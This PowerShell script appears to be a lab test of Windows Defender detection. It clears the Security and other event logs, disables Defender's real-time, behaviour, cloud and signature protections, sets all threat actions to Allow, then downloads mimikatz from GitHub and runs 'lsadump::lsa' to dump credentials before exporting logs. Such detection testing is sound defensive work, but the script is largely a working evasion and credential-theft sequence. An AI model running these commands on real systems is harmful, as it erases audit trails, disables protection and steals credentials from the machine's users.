# Normal PowerShell # Clear event logs $EventLogs = @( "Microsoft-Windows-Windows Defender/Operational" "Microsoft-Windows-Windows Defender/WHC" "Application" "System" "Security" ) foreach ($EventLogName in $EventLogs) { & wevtutil cl "$EventLogName" Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was cleared" } Start-Sleep 60 $StartDate = $(Get-Date -Format "yyyy-MM-dd-HHmmss") # Start configuration changes Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Start configuration changes" # 1.1 Disable virus and threat protection Set-MpPreference -DisableIOAVProtection $true -DisableEmailScanning $true -DisableBlockAtFirstSeen $true Start-Sleep 60 # 1.2 Disable real-time protection Set-MpPreference -DisableRealtimeMonitoring $true Start-Sleep 60 # 1.3 Turning off behavior monitoring Set-MpPreference -DisableBehaviorMonitoring $true Start-Sleep 60 # 1.4 Disable cloud-delivered protection Set-MpPreference -MAPSReporting 0 # Disabled Start-Sleep 60 # 1.5 Disable signature updates Set-MpPreference -SharedSignaturesPath "-" Start-Sleep 60 # 1.6 Add exclusions path* Set-MpPreference -ExclusionPath "C:\AVTest" Start-Sleep 60 # 1.7 Disable automatic actions on detected threats Set-MpPreference -UnknownThreatDefaultAction Allow -LowThreatDefaultAction Allow -HighThreatDefaultAction Allow -ModerateThreatDefaultAction Allow -SevereThreatDefaultAction Allow Start-Sleep 60 # 1.8 Change default action for specific malware* Set-MpPreference -ThreatIDDefaultAction_Actions @(6,6) -ThreatIDDefaultAction_Ids @(2147519003,2147717805) Start-Sleep 60 # 1.9 Removing security intelligence updates & "$ENV:ProgramFiles\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Start-Sleep 60 # End of configuration Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Configuration done." # Try to update signatures Update-MpSignature -Verbose Start-Sleep 60 # Test detection of Eicar $Paths = @("C:\AVTest\", "C:\AVTest2\") foreach ($Path in $Paths) { New-Item -Type Directory -Path $Path -EA 0 Set-Location $Path Write-Output 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > eicartest.file Start-MpScan -ScanType CustomScan -ScanPath $Path Get-Content .\eicartest.file Start-Sleep 60 } # Test detection of mimikatz cd "C:\AVTest\" $ProgressPreference = "SilentlyContinue" [Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12) Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip" -OutFile "mimikatz.zip" Unblock-File "mimikatz.zip" Expand-Archive -Path "mimikatz.zip" -DestinationPath . # Execute mimikatz .\x64\mimikatz.exe "lsadump::lsa" "exit" # Scan folder Start-MpScan -ScanType CustomScan -ScanPath "C:\AVTest\" Start-Sleep 60 # Export event logs foreach ($EventLogName in $EventLogs) { $FileName = $EventLogName -replace "/", '-' & wevtutil epl "$EventLogName" "C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx" Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was exported to `"C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx`"" }